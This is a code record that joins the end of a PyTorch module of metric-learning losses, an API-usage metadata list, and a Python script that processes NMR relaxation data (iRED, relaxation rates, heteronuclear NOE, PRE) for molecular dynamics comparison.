torch.max(torch.tensor(0, dtype=torch.float).cuda(), self.margin + dist_ap - dist_an)) / num_loss
final_loss = triplet_loss * 1.0
with torch.no_grad():
assert normalized == True
cos_theta = torch.mm(inputs, inputs.t())
mask = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
avg_ap = cos_theta[(mask.float() - torch.eye(nB).cuda()) == 1].mean()
avg_an = cos_theta[mask.float() == 0].mean()
return final_loss, avg_ap, avg_an
class TripletSemihardLoss(Module):
def __init__(self, margin=0.2):
super(TripletSemihardLoss, self).__init__()
self.margin = margin
def forward(self, inputs, targets, normalized=True):
norm_temp = inputs.norm(dim=1, p=2, keepdim=True)
if normalized:
inputs = inputs.div(norm_temp.expand_as(inputs))
nB = inputs.size(0)
idx_ = torch.arange(0, nB, dtype=torch.long)
dist = torch.pow(inputs, 2).sum(dim=1, keepdim=True).expand(nB, nB)
dist = dist + dist.t()
# use squared
dist.addmm_(1, -2, inputs, inputs.t()).clamp_(min=1e-12)
temp_euclidean_score = dist * 1.0
adjacency = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
adjacency_not = ~ adjacency
dist_tile = dist.repeat(nB, 1)
mask = (adjacency_not.repeat(nB, 1)) * (dist_tile > (dist.transpose(0, 1).contiguous().view(-1, 1)))
mask_final = (mask.float().sum(dim=1, keepdim=True) > 0).view(nB, nB).transpose(0, 1)
# negatives_outside: smallest D_an where D_an > D_ap
temp1 = (dist_tile - dist_tile.max(dim=1, keepdim=True)[0]) * (mask.float())
negtives_outside = temp1.min(dim=1, keepdim=True)[0] + dist_tile.max(dim=1, keepdim=True)[0]
negtives_outside = negtives_outside.view(nB, nB).transpose(0, 1)
# negatives_inside: largest D_an
temp2 = (dist - dist.min(dim=1, keepdim=True)[0]) * (adjacency_not.float())
negtives_inside = temp2.max(dim=1, keepdim=True)[0] + dist.min(dim=1, keepdim=True)[0]
negtives_inside = negtives_inside.repeat(1, nB)
semi_hard_negtives = torch.where(mask_final, negtives_outside, negtives_inside)
loss_mat = self.margin + dist - semi_hard_negtives
mask_positives = adjacency.float() - torch.eye(nB).cuda()
mask_positives = mask_positives.detach()
num_positives = torch.sum(mask_positives)
triplet_loss = torch.sum(
torch.max(torch.tensor(0, dtype=torch.float).cuda(), loss_mat * mask_positives)) / num_positives
final_loss = triplet_loss * 1.0
with torch.no_grad():
assert normalized == True
cos_theta = torch.mm(inputs, inputs.t())
mask = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
avg_ap = cos_theta[(mask.float() - torch.eye(nB).cuda()) == 1].mean()
avg_an = cos_theta[mask.float() == 0].mean()
return final_loss, avg_ap, avg_an
def cross_entropy(logits, target, size_average=True):
if size_average:
return torch.mean(torch.sum(- target * F.log_softmax(logits, -1), -1))
else:
return torch.sum(torch.sum(- target * F.log_softmax(logits, -1), -1))
class NpairLoss(Module):
def __init__(self):
super(NpairLoss, self).__init__()
def forward(self, inputs, targets, normalized=False):
nB = inputs.size(0)
norm_temp = inputs.norm(p=2, dim=1, keepdim=True)
inputs_n = inputs.div(norm_temp.expand_as(inputs))
mm_logits = torch.mm(inputs_n, inputs_n.t()).detach()
mask = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
cos_ap = mm_logits[(mask.float() - torch.eye(nB).float().cuda()) == 1].view(nB, -1)
cos_an = mm_logits[mask != 1].view(nB, -1)
avg_ap = torch.mean(cos_ap)
avg_an = torch.mean(cos_an)
if normalized:
inputs = inputs.div(norm_temp.expand_as(inputs))
inputs = inputs * 5.0
labels = targets.view(-1).cpu().numpy()
pids = np.unique(labels)
anchor_idx = []
positive_idx = []
for i in pids:
ap_idx = np.where(labels == i)[0]
anchor_idx.append(ap_idx[0])
positive_idx.append(ap_idx[1])
anchor = inputs[anchor_idx, :]
positive = inputs[positive_idx, :]
batch_size = anchor.size(0)
target = torch.from_numpy(pids).cuda()
target = target.view(target.size(0), 1)
target = (target == torch.transpose(target, 0, 1)).float()
target = target / torch.sum(target, dim=1, keepdim=True).float()
logit = torch.matmul(anchor, torch.transpose(positive, 0, 1))
loss_ce = cross_entropy(logit, target)
loss = loss_ce * 1.0
return loss, avg_ap, avg_an
class MultiSimilarityLoss(Module):
def __init__(self):
super(MultiSimilarityLoss, self).__init__()
self.thresh = 0.5
self.margin = 0.1
self.scale_pos = 2.0
self.scale_neg = 40.0
def forward(self, feats, labels):
norm = feats.norm(dim=1, p=2, keepdim=True)
feats = feats.div(norm.expand_as(feats))
labels = labels.view(-1)
assert feats.size(0) == labels.size(0), \
f"feats.size(0): {feats.size(0)} is not equal to labels.size(0): {labels.size(0)}"
batch_size = feats.size(0)
sim_mat = torch.matmul(feats, torch.t(feats))
epsilon = 1e-5
loss = list()
avg_aps = list()
avg_ans = list()
for i in range(batch_size):
pos_pair_ = sim_mat[i][labels == labels[i]]
pos_pair_ = pos_pair_[pos_pair_ < 1 - epsilon]
neg_pair_ = sim_mat[i][labels != labels[i]]
if len(neg_pair_) < 1 or len(pos_pair_) < 1:
continue
avg_aps.append(pos_pair_.mean())
avg_ans.append(neg_pair_.mean())
neg_pair = neg_pair_[neg_pair_ + self.margin > torch.min(pos_pair_)]
pos_pair = pos_pair_[pos_pair_ - self.margin < torch.max(neg_pair_)]
if len(neg_pair) < 1 or len(pos_pair) < 1:
continue
# weighting step
pos_loss = 1.0 / self.scale_pos * torch.log(
1 + torch.sum(torch.exp(-self.scale_pos * (pos_pair - self.thresh))))
neg_loss = 1.0 / self.scale_neg * torch.log(
1 + torch.sum(torch.exp(self.scale_neg * (neg_pair - self.thresh))))
loss.append(pos_loss + neg_loss)
if len(loss) == 0:
print('with ms loss = 0 !')
loss = torch.zeros([], requires_grad=True).cuda()
else:
loss = sum(loss) / batch_size
loss = loss.view(-1)
avg_ap = sum(avg_aps) / batch_size
avg_an = sum(avg_ans) / batch_size
return loss, avg_ap, avg_an
|
[
"torch.mean",
"torch.t",
"torch.from_numpy",
"torch.eye",
"torch.where",
"torch.exp",
"numpy.where",
"torch.max",
"torch.arange",
"torch.nn.functional.log_softmax",
"torch.pow",
"torch.zeros",
"torch.tensor",
"torch.no_grad",
"torch.sum",
"torch.min",
"numpy.unique",
"torch.transpose"
] |
[((564, 601), 'torch.arange', 'torch.arange', (['(0)', 'nB'], {'dtype': 'torch.long'}), '(0, nB, dtype=torch.long)\n', (576, 601), False, 'import torch\n'), ((2262, 2299), 'torch.arange', 'torch.arange', (['(0)', 'nB'], {'dtype': 'torch.long'}), '(0, nB, dtype=torch.long)\n', (2274, 2299), False, 'import torch\n'), ((3520, 3578), 'torch.where', 'torch.where', (['mask_final', 'negtives_outside', 'negtives_inside'], {}), '(mask_final, negtives_outside, negtives_inside)\n', (3531, 3578), False, 'import torch\n'), ((3779, 3804), 'torch.sum', 'torch.sum', (['mask_positives'], {}), '(mask_positives)\n', (3788, 3804), False, 'import torch\n'), ((5208, 5226), 'torch.mean', 'torch.mean', (['cos_ap'], {}), '(cos_ap)\n', (5218, 5226), False, 'import torch\n'), ((5244, 5262), 'torch.mean', 'torch.mean', (['cos_an'], {}), '(cos_an)\n', (5254, 5262), False, 'import torch\n'), ((5446, 5463), 'numpy.unique', 'np.unique', (['labels'], {}), '(labels)\n', (5455, 5463), True, 'import numpy as np\n'), ((1502, 1517), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1515, 1517), False, 'import torch\n'), ((4011, 4026), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4024, 4026), False, 'import torch\n'), ((6063, 6094), 'torch.transpose', 'torch.transpose', (['positive', '(0)', '(1)'], {}), '(positive, 0, 1)\n', (6078, 6094), False, 'import torch\n'), ((6828, 6842), 'torch.t', 'torch.t', (['feats'], {}), '(feats)\n', (6835, 6842), False, 'import torch\n'), ((5559, 5580), 'numpy.where', 'np.where', (['(labels == i)'], {}), '(labels == i)\n', (5567, 5580), True, 'import numpy as np\n'), ((5806, 5828), 'torch.from_numpy', 'torch.from_numpy', (['pids'], {}), '(pids)\n', (5822, 5828), False, 'import torch\n'), ((3685, 3698), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (3694, 3698), False, 'import torch\n'), ((4497, 4522), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['logits', '(-1)'], {}), '(logits, -1)\n', (4510, 4522), True, 'import torch.nn.functional as F\n'), ((4585, 4610), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['logits', '(-1)'], {}), '(logits, -1)\n', (4598, 4610), True, 'import torch.nn.functional as F\n'), ((5913, 5942), 'torch.transpose', 'torch.transpose', (['target', '(0)', '(1)'], {}), '(target, 0, 1)\n', (5928, 5942), False, 'import torch\n'), ((5978, 6016), 'torch.sum', 'torch.sum', (['target'], {'dim': '(1)', 'keepdim': '(True)'}), '(target, dim=1, keepdim=True)\n', (5987, 6016), False, 'import torch\n'), ((7383, 7403), 'torch.min', 'torch.min', (['pos_pair_'], {}), '(pos_pair_)\n', (7392, 7403), False, 'import torch\n'), ((7464, 7484), 'torch.max', 'torch.max', (['neg_pair_'], {}), '(neg_pair_)\n', (7473, 7484), False, 'import torch\n'), ((8014, 8049), 'torch.zeros', 'torch.zeros', (['[]'], {'requires_grad': '(True)'}), '([], requires_grad=True)\n', (8025, 8049), False, 'import torch\n'), ((618, 638), 'torch.pow', 'torch.pow', (['inputs', '(2)'], {}), '(inputs, 2)\n', (627, 638), False, 'import torch\n'), ((2316, 2336), 'torch.pow', 'torch.pow', (['inputs', '(2)'], {}), '(inputs, 2)\n', (2325, 2336), False, 'import torch\n'), ((946, 959), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (955, 959), False, 'import torch\n'), ((1360, 1394), 'torch.tensor', 'torch.tensor', (['(0)'], {'dtype': 'torch.float'}), '(0, dtype=torch.float)\n', (1372, 1394), False, 'import torch\n'), ((3862, 3896), 'torch.tensor', 'torch.tensor', (['(0)'], {'dtype': 'torch.float'}), '(0, dtype=torch.float)\n', (3874, 3896), False, 'import torch\n'), ((7684, 7737), 'torch.exp', 'torch.exp', 
(['(-self.scale_pos * (pos_pair - self.thresh))'], {}), '(-self.scale_pos * (pos_pair - self.thresh))\n', (7693, 7737), False, 'import torch\n'), ((7827, 7879), 'torch.exp', 'torch.exp', (['(self.scale_neg * (neg_pair - self.thresh))'], {}), '(self.scale_neg * (neg_pair - self.thresh))\n', (7836, 7879), False, 'import torch\n'), ((1730, 1743), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (1739, 1743), False, 'import torch\n'), ((4239, 4252), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (4248, 4252), False, 'import torch\n'), ((5090, 5103), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (5099, 5103), False, 'import torch\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# moldynplot.relaxation.py
#
# Copyright (C) 2012-2017 <NAME>
# All rights reserved.
#
# This software may be modified and distributed under the terms of the
# BSD license. See the LICENSE file for details.
"""
Processes NMR relaxation and related data
"""
################################### MODULES ###################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
################################## FUNCTIONS ##################################
def spawn(function):
def run_function(queue_in, queue_out):
while True:
i, argument = queue_in.get()
if i is None:
break # 'None' signals that queue is empty
queue_out.put((i, function(argument)))
return run_function
def multiprocess_map(function, arguments, n_processes=1):
"""
    Runs a *function* with *arguments* using *n_processes*. Meant
    as a replacement for multiprocessing.Pool.imap_unordered,
    which can only accept module-level functions.
    **Arguments:**
        :*function*:    Function to run
        :*arguments*:   Iterable of arguments to pass to function
        :*n_processes*: Number of processes to use
**Returns:**
:*results*: List of results returned from *function*
.. todo:
- Does this work, or can it be made to smoothly work, with more
complex arguments?
- Accept multiple functions, in addition to arguments
- Additional improvements likely possible
"""
from multiprocessing import Queue, Process
# Initialize queues
queue_in = Queue(1)
queue_out = Queue()
# Initialize processes and link to input and output queues
processes = [Process(target=spawn(function), args=(queue_in, queue_out))
for i in range(n_processes)]
for p in processes:
p.daemon = True
p.start()
# Construct input queue, including 'None' signals to terminate
input = [queue_in.put((i, argument)) for i, argument in
enumerate(arguments)]
for i in range(n_processes):
queue_in.put((None, None))
# Retrieve output queue
output = [queue_out.get() for i in range(len(input))]
# Rejoin processes and return results
for p in processes:
p.join()
return [x for i, x in sorted(output)]
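# Illustrative usage of multiprocess_map (a sketch, not part of the pipeline;
# 'square' is a hypothetical helper used only for demonstration):
#
#     def square(x):
#         return x * x
#
#     results = multiprocess_map(square, range(8), n_processes=4)
#     # results == [0, 1, 4, 9, 16, 25, 36, 49], sorted back into input order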
def process_ired(infiles, outfile, indexfile=None, **kwargs):
"""
"""
from os import devnull
import re
from subprocess import Popen, PIPE
import pandas as pd
import numpy as np
r1r2noe_datasets = []
s2_datasets = []
# Load data
for i, infile in enumerate(infiles):
with open(devnull, "w") as fnull:
fields = Popen("head -n 1 {0}".format(infile), stdout=PIPE,
stderr=fnull, shell=True).stdout.read().strip()
re_t1t2noe = re.compile(
"^#Vec\s+[\w_]+\[T1\]\s+[\w_]+\[T2\]\s+[\w_]+\[NOE\]$")
re_s2 = re.compile("^#Vec\s+[\w_]+\[S2\]$")
if re.match(re_t1t2noe, fields):
raw_data = np.loadtxt(infile, dtype=np.float32)
read_csv_kw = kwargs.get("read_csv_kw",
dict(delim_whitespace=True, header=0, index_col=0,
names=["r1", "r2", "noe"]))
raw_data = pd.read_csv(infile, **read_csv_kw)
raw_data["r1"] = 1 / raw_data["r1"]
raw_data["r2"] = 1 / raw_data["r2"]
r1r2noe_datasets.append(raw_data)
elif re.match(re_s2, fields):
raw_data = np.loadtxt(infile, dtype=np.float32)
read_csv_kw = kwargs.get("read_csv_kw",
dict(delim_whitespace=True, header=0, index_col=0, names=["s2"]))
raw_data = pd.read_csv(infile, **read_csv_kw)
s2_datasets.append(raw_data)
else:
            raise Exception("Unrecognized field format in '{0}'".format(infile))
if indexfile is not None:
residue = np.loadtxt(indexfile, dtype=np.str).flatten()
# Process data
items = []
fmt = []
if indexfile is not None:
items.append(("residue", residue))
fmt.append("%12s")
else:
fmt.append("%12d")
if len(r1r2noe_datasets) >= 2:
r1r2noe_mean = pd.concat(r1r2noe_datasets).groupby(level=0).mean()
r1r2noe_std = pd.concat(r1r2noe_datasets).groupby(level=0).std()
items.extend([("r1", r1r2noe_mean["r1"]), ("r1 se", r1r2noe_std["r1"]),
("r2", r1r2noe_mean["r2"]), ("r2 se", r1r2noe_std["r2"]),
("noe", r1r2noe_mean["noe"]), ("noe se", r1r2noe_std["noe"])])
fmt.extend(
["%11.5f", "%11.5f", "%11.5f", "%11.5f", "%11.5f", "%11.5f"])
elif len(r1r2noe_datasets) == 1:
r1r2noe_mean = r1r2noe_datasets[0]
items.extend([("r1", r1r2noe_mean["r1"]), ("r2", r1r2noe_mean["r2"]),
("noe", r1r2noe_mean["noe"])])
fmt.extend(["%11.5f", "%11.5f", "%11.5f"])
if len(s2_datasets) >= 2:
s2_mean = pd.concat(s2_datasets).groupby(level=0).mean()
s2_std = pd.concat(s2_datasets).groupby(level=0).std()
items.extend([("s2", s2_mean["s2"]), ("s2 se", s2_std["s2"])])
fmt.extend(["%11.5f", "%11.5f"])
elif len(s2_datasets) == 1:
s2_mean = s2_datasets[0]
items.extend([("s2", s2_mean["s2"])])
fmt.extend(["%11.5f"])
data = pd.DataFrame.from_items(items)
if indexfile is not None:
data.set_index("residue", inplace=True)
else:
data.index.name = "vector"
columns = [data.index.name] + list(data.columns.values)
header = "{0:<10s}".format(columns.pop(0))
for column in columns:
header += "{0:>12s}".format(column)
np.savetxt(outfile, np.column_stack((data.index.values, data.values)),
fmt=fmt, header=header, comments='#')
def process_error(sim_infiles, exp_infiles, outfile, **kwargs):
"""
"""
import pandas as pd
import numpy as np
if len(sim_infiles) != len(exp_infiles):
raise ValueError("""Number of simulation input files must
match number of experimental input files, as they are treated
pairwise. {0} simulation input file(s) and {1} experiment input
file(s) provided.""".format(len(sim_infiles), len(exp_infiles)))
# Work through each pair of infiles
errs = []
final_index = None
for sim_infile, exp_infile in zip(sim_infiles, exp_infiles):
print("Comparing simulation infile '{0}' ".format(
sim_infile) + "with experimental infile '{0}':".format(exp_infile))
# Load infiles and select shared indexes and columns
sim = pd.read_csv(sim_infile, delim_whitespace=True, index_col=0)
exp = pd.read_csv(exp_infile, delim_whitespace=True, index_col=0)
overlap = sim.index.intersection(exp.index)
if final_index is None:
final_index = exp.index
final_index = final_index.union(overlap)
sim = sim.loc[overlap]
exp = exp.loc[overlap]
err_cols = [c for c in sim.columns.values if
not c.endswith(" se") and c in exp.columns.values]
err_se_cols = [c + " se" for c in err_cols if
c + " se" in sim.columns.values and c + " se" in
exp.columns.values]
print(" Files share fields {0} and {1} for {2} residues".format(
str(map(str, err_cols)).replace("'", ""),
str(map(str, err_se_cols)).replace("'", ""), len(overlap)))
# Calculate error of available fields
err = pd.DataFrame(0, index=overlap,
columns=[x for t in zip(err_cols, err_se_cols) for x in t])
err[err_cols] = (
np.abs(exp[err_cols] - sim[err_cols]) / np.abs(exp[err_cols]))
# Calculate uncertainty of error of available fields
if len(err_se_cols) != 0:
err[err_se_cols] = 0
# //@formatter:off
err[err_se_cols] = np.sqrt(
(err[err_cols].values) ** 2 *
((np.sqrt(exp[err_se_cols].values ** 2 +
sim[err_se_cols].values ** 2) /
(exp[err_cols].values - sim[err_cols].values)) ** 2 +
(exp[err_se_cols].values / exp[ err_cols].values) ** 2))
# //@formatter:on
errs.append(err)
# Determine final columns and indexes
final_cols = []
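    # Residue labels follow a 'NAME:number' pattern (e.g. 'GLN:2'), so sort
    # the final index by the numeric part after the colon.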
final_index = sorted(final_index, key=lambda x: int(x.split(":")[1]))
for err in errs:
for col in err.columns.values:
if not col in final_cols:
final_cols.append(col)
# Sum the columns
final = pd.DataFrame(0.0, index=final_index, columns=final_cols)
counts = pd.DataFrame(0, index=final_index, columns=final_cols)
for err in errs:
for col in err.columns.values:
if not col.endswith(" se"):
final[col].loc[err.index] += err[col].loc[err.index]
else:
final[col].loc[err.index] += err[col].loc[err.index] ** 2
counts[col].loc[err.index] += 1
# Average the columns
print("Averaging fields:")
for col in final_cols:
if not col.endswith(" se"):
print(" Averaging field '{0}'".format(col))
final[col] /= counts[col]
else:
print(" Progagating uncertainty for field '{0}'".format(col))
final[col] = np.sqrt(final[col]) / counts[col]
# Write outfile
print(
"Writing outfile '{0}' with fields ".format(outfile) + "{0} for ".format(
str(map(str, final_cols)).replace("'", "")) + "{0} residues".format(
len(final_index)))
header = "residue "
for col in final_cols:
header += "{0:>12s}".format(col)
fmt = ["%12s"] + ["%11.5f"] * len(final_cols)
np.savetxt(outfile, np.column_stack((final.index.values, final.values)),
fmt=fmt, header=header, comments='#')
def process_relax(relax_type, peaklist, infiles, delays, error_method,
n_synth_datasets, outfile, verbose=1, debug=0, **kwargs):
"""
"""
from glob import glob
from os.path import expandvars
import nmrglue
import numpy as np
import pandas as pd
from scipy.optimize import curve_fit
# Process arguments
processed_infiles = []
for infile in infiles:
processed_infiles += glob(expandvars(infile))
infiles = processed_infiles
if len(delays) != len(infiles):
        raise ValueError("Number of delays must match number of infiles.")
peaklist = expandvars(peaklist)
outfile = expandvars(outfile)
# Load peaklist
if verbose >= 1:
print("Loading peaklist from '{0}'".format(peaklist))
def convert_name(name):
return "{0}:{1}".format(name[-4:-1].upper(), name[2:-4])
relax = pd.read_csv(peaklist, sep="\t", usecols=[2, 3, 4], index_col=2,
converters={4: convert_name}, names=["1H", "15N", "residue"], skiprows=1)
# Load peak intensities from spectra
for infile, delay in zip(infiles, delays):
if verbose >= 1:
print("Loading intensities from '{0}'".format(infile))
parameters, intensity = nmrglue.pipe.read(infile)
hydrogen = nmrglue.pipe.make_uc(parameters, intensity,
dim=1).ppm_scale()
nitrogen = nmrglue.pipe.make_uc(parameters, intensity,
dim=0).ppm_scale()
def calc_intensity(peak, **kwargs):
H_index = np.argmin((hydrogen - peak["1H"]) ** 2)
N_index = np.argmin((nitrogen - peak["15N"]) ** 2)
return intensity[N_index, H_index]
relax["{0} ms".format(delay)] = relax.apply(calc_intensity, axis=1)
# Calculate relaxation rates
delays = np.array(delays, np.float64) / 1000
def calc_relax(peak, **kwargs):
if verbose >= 1:
print("Calculating relaxation for {0}".format(peak.name))
def model_function(delay, intensity, relaxation):
return intensity * np.exp(-1 * delay * relaxation)
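        # Single-exponential decay model, I(t) = I0 * exp(-R * t); I0 and R
        # are fit with scipy's curve_fit below.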
I = np.array(peak.filter(regex=(".*ms")).values, np.float64)
I0, R = curve_fit(model_function, delays, I, p0=(I[0], 1.0))[0]
# Calculate error
if error_method == "rmse":
error = np.sqrt(np.mean((I - model_function(delays, I0, R)) ** 2))
elif error_method == "mae":
error = np.mean(np.sqrt((I - model_function(delays, I0, R)) ** 2))
# Construct synthetic relaxation profiles
synth_datasets = np.zeros((n_synth_datasets, I.size))
for i, I_mean in enumerate(model_function(delays, I0, R)):
synth_datasets[:, i] = np.random.normal(I_mean, error,
n_synth_datasets)
def synth_fit_decay(synth_intensity):
try:
synth_I0, synth_R = \
curve_fit(model_function, delays, synth_intensity,
p0=(I0, R))[0]
return synth_R
except RuntimeError:
if verbose >= 1:
print("Unable to calculate standard error for {0}".format(
peak.name))
return np.nan
# Calculate standard error
synth_Rs = multiprocess_map(synth_fit_decay, synth_datasets, 16)
R_se = np.std(synth_Rs)
return pd.Series([I0, R, R_se])
# Calculate relaxation rates and standard errors
fit = relax.apply(calc_relax, axis=1)
fit.columns = ["I0", relax_type, relax_type + " se"]
relax = relax.join(fit)
# Write outfile
if verbose >= 1:
print("Writing outfile '{0}'".format(outfile))
columns = [relax.index.name] + list(relax.columns.values)
header = "{0:<11s}".format(columns.pop(0))
for column in columns:
header += "{0:>12s}".format(column)
fmt = ["%12s", "%11.4f", "%11.4f"] + ["%11d"] * len(delays) + ["%11d",
"%11.4f", "%11.4f"]
np.savetxt(outfile, np.column_stack((relax.index.values, relax.values)),
fmt=fmt, header=header, comments='#')
def process_hetnoe(peaklist, infiles, outfile, verbose=1, debug=0, **kwargs):
"""
"""
from glob import glob
from os.path import expandvars
import nmrglue
import numpy as np
import pandas as pd
# Process arguments
processed_infiles = []
for infile in infiles:
processed_infiles += glob(expandvars(infile))
infiles = processed_infiles
if len(infiles) != 2:
        raise ValueError("Exactly two infiles (saturated and unsaturated spectra) are required.")
peaklist = expandvars(peaklist)
outfile = expandvars(outfile)
# Load peaklist
if verbose >= 1:
print("Loading peaklist from '{0}'".format(peaklist))
def convert_name(name):
return "{0}:{1}".format(name[-4:-1].upper(), name[2:-4])
relax = pd.read_csv(peaklist, sep="\t", usecols=[2, 3, 4], index_col=2,
converters={4: convert_name}, names=["1H", "15N", "residue"], skiprows=1)
# Load peak intensities from spectra
def calc_intensity(peak, **kwargs):
H_index = np.argmin((hydrogen - peak["1H"]) ** 2)
N_index = np.argmin((nitrogen - peak["15N"]) ** 2)
return intensity[N_index, H_index]
if verbose >= 1:
print("Loading intensities from '{0}'".format(infiles[0]))
parameters, intensity = nmrglue.pipe.read(infiles[0])
hydrogen = nmrglue.pipe.make_uc(parameters, intensity, dim=1).ppm_scale()
nitrogen = nmrglue.pipe.make_uc(parameters, intensity, dim=0).ppm_scale()
hydrogen += 0.0612858
nitrogen += 0.08399
relax["sat"] = relax.apply(calc_intensity, axis=1)
sat_se = intensity[np.logical_and(intensity > -intensity.std(),
intensity < intensity.std())].std()
print(sat_se)
sat_se = 54588.8
print(sat_se)
if verbose >= 1:
print("Loading intensities from '{0}'".format(infiles[1]))
parameters, intensity = nmrglue.pipe.read(infiles[1])
relax["nosat"] = relax.apply(calc_intensity, axis=1)
nosat_se = intensity[np.logical_and(intensity > -intensity.std(),
intensity < intensity.std())].std()
print(nosat_se)
nosat_se = 58479.8
print(nosat_se)
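    # The heteronuclear NOE is the ratio of saturated to unsaturated peak
    # intensities; its uncertainty follows from propagating the two intensity
    # uncertainties through the ratio.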
relax["noe"] = relax["sat"] / relax["nosat"]
relax["noe se"] = np.sqrt(
(sat_se / relax["sat"]) ** 2 + (nosat_se / relax["nosat"]) ** 2) * relax[
"noe"]
# Write outfile
if verbose >= 1:
print("Writing outfile '{0}'".format(outfile))
columns = [relax.index.name] + list(relax.columns.values)
header = "{0:<11s}".format(columns.pop(0))
for column in columns:
header += "{0:>12s}".format(column)
fmt = ["%12s", "%11.4f", "%11.4f"] + ["%11d"] * 2 + ["%11.4f", "%11.4f"]
np.savetxt(outfile, np.column_stack((relax.index.values, relax.values)),
fmt=fmt, header=header, comments='#')
def process_pre(dia_infile, para_infile, outfile, verbose=1, debug=0,
**kwargs):
"""
"""
from glob import glob
from os.path import expandvars
import numpy as np
import pandas as pd
# Process arguments
dia_infile = glob(expandvars(dia_infile))[0]
para_infile = glob(expandvars(para_infile))[0]
if verbose >= 1:
print(
"Loading diamagnetic relaxation rates from '{0}'".format(dia_infile))
dia_relax = pd.read_csv(dia_infile, index_col=0, delimiter=r"\s\s+")
dia_relax.index.name = "residue"
dia_relax.rename(
columns={"I0": "dia I0", "I0 se": "dia I0 se", "r2": "dia r2",
"r2 se": "dia r2 se", }, inplace=True)
if verbose >= 1:
print("Loading paramagnetic relaxation rates from '{0}'".format(
para_infile))
para_relax = pd.read_csv(para_infile, index_col=0, delimiter=r"\s\s+")
para_relax.index.name = "residue"
para_relax.rename(
columns={"I0": "para I0", "I0 se": "para I0 se", "r2": "para r2",
"r2 se": "para r2 se", }, inplace=True)
relax = dia_relax[
["1H", "15N", "dia I0", "dia I0 se", "dia r2", "dia r2 se"]]
relax = pd.concat(
(relax, para_relax[["para I0", "para I0 se", "para r2", "para r2 se"]]),
axis=1)
# //@formatter:off
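    # Ratios of paramagnetic to diamagnetic intensities (I/I0) and of
    # diamagnetic to paramagnetic rates (r20/r2), with uncertainties from
    # standard error propagation; rho2 is the paramagnetic minus diamagnetic
    # R2 (the PRE).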
relax["I/I0"] = relax["para I0"] / relax["dia I0"]
relax["I/I0 se"] = np.sqrt(relax["I/I0"] ** 2 * \
((relax["para I0 se"] / relax["para I0"]) ** 2 + \
(relax["dia I0 se"] / relax["dia I0"]) ** 2))
relax["r20/r2"] = relax["dia r2"] / relax["para r2"]
relax["r20/r2 se"] = np.sqrt(relax["r20/r2"] ** 2 * \
((relax["dia r2 se"] / relax["dia r2"]) ** 2 + \
(relax["para r2 se"] / relax["para r2"]) ** 2))
relax["rho2"] = relax["para r2"] - relax["dia r2"]
relax["rho2 se"] = np.sqrt(
relax["para r2 se"] ** 2 + relax["dia r2 se"] ** 2)
# //@formatter:on
# Write outfile
if verbose >= 1:
print("Writing outfile '{0}'".format(outfile))
columns = [relax.index.name] + list(relax.columns.values)
header = "{0:<11s}".format(columns.pop(0))
for column in columns:
header += "{0:>12s}".format(column)
with open(outfile, "w") as out:
relax["dia I0"][np.isnan(relax["dia I0"])] = 0
relax["dia I0 se"][np.isnan(relax["dia I0 se"])] = 0
relax["para I0"][np.isnan(relax["para I0"])] = 0
relax["para I0 se"][np.isnan(relax["para I0 se"])] = 0
out.write("#" + header + "\n")
for residue in relax.index:
            # This is an abomination. Why is this the least painful way to
            # write a decent text file?
row = relax.loc[residue]
out.write("{0:12s} {1:11.2f} {2:11.1f} {3:11d} {4:11d} "
"{5:11.2f} {6:11.2f} {7:11d} {8:11d} {9:11.2f} "
"{10:11.2f} {11:11.3f} {12:11.3f} {13:11.3f} "
"{14:11.3f} {15:11.2f} {16:11.2f}\n".format(residue,
row["1H"], row["15N"], int(row["dia I0"]), int(row["dia I0 se"]),
row["dia r2"], row["dia r2 se"], int(row["para I0"]),
int(row["para I0 se"]), row["para r2"], row["para r2 se"],
row["I/I0"], row["I/I0 se"], row["r20/r2"], row["r20/r2 se"],
row["rho2"], row["rho2 se"]))
#################################### MAIN #####################################
if __name__ == "__main__":
import argparse
# Prepare argument parser
parser = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawTextHelpFormatter)
subparsers = parser.add_subparsers(dest="mode", description="")
# Prepare iRED subparser
ired_subparser = subparsers.add_parser(name="ired",
help="Process iRED data")
ired_subparser.set_defaults(function=process_ired)
input_group = ired_subparser.add_argument_group("input")
action_group = ired_subparser.add_argument_group("action")
output_group = ired_subparser.add_argument_group("output")
input_group.add_argument("-infile", required=True, dest="infiles",
nargs="+", type=str, help="""cpptraj output file(s) from
which to load datasets; may be plain text or compressed""")
input_group.add_argument("-indexfile", required=False, type=str,
help="""Text file from which to load residue names; if
omitted will be taken from columns of first infile""")
output_group.add_argument("-outfile", required=True, type=str,
help="Text file to which processed data will be output")
# Prepare error subparser
error_subparser = subparsers.add_parser(name="error", help="""Calculates
error of simulated relaxation relative to experiment""",
description="""Calculates error of simulated relaxation relative to
experiment. The intended use case is to break down errors relative to
experimental data collected at multiple magnetic fields or by multiple
groups, error(residue, measurement, magnet/group), into a form that
is easier to visualize and communicate, error(residue, measurement).
Reads in a series of input files containing simulated data and a
series of files containing corresponding experimental data. These
files are treated in pairs and the error between all data points
    present in both (e.g. row 'GLN:2', column 'r1') is calculated. Columns
    ending in '_se' are treated as uncertainties, and are propagated into
    uncertainties in the resulting errors rather than being averaged.
    Take caution when processing datasets that lack uncertainties alongside
    those that do (experimental uncertainties are not always reported), as
    the resulting uncertainties in the residuals will be incorrect.""")
error_subparser.set_defaults(function=process_error)
input_group = error_subparser.add_argument_group("input")
action_group = error_subparser.add_argument_group("action")
output_group = error_subparser.add_argument_group("output")
input_group.add_argument("-sim_infile", required=True, dest="sim_infiles",
nargs="+", type=str,
help="input file(s) from which to load simulation datasets")
input_group.add_argument("-exp_infile", required=True, dest="exp_infiles",
nargs="+", type=str,
help="input file(s) from which to load experimental datasets")
output_group.add_argument("-outfile", required=True, type=str,
help="Text file to which processed data will be output")
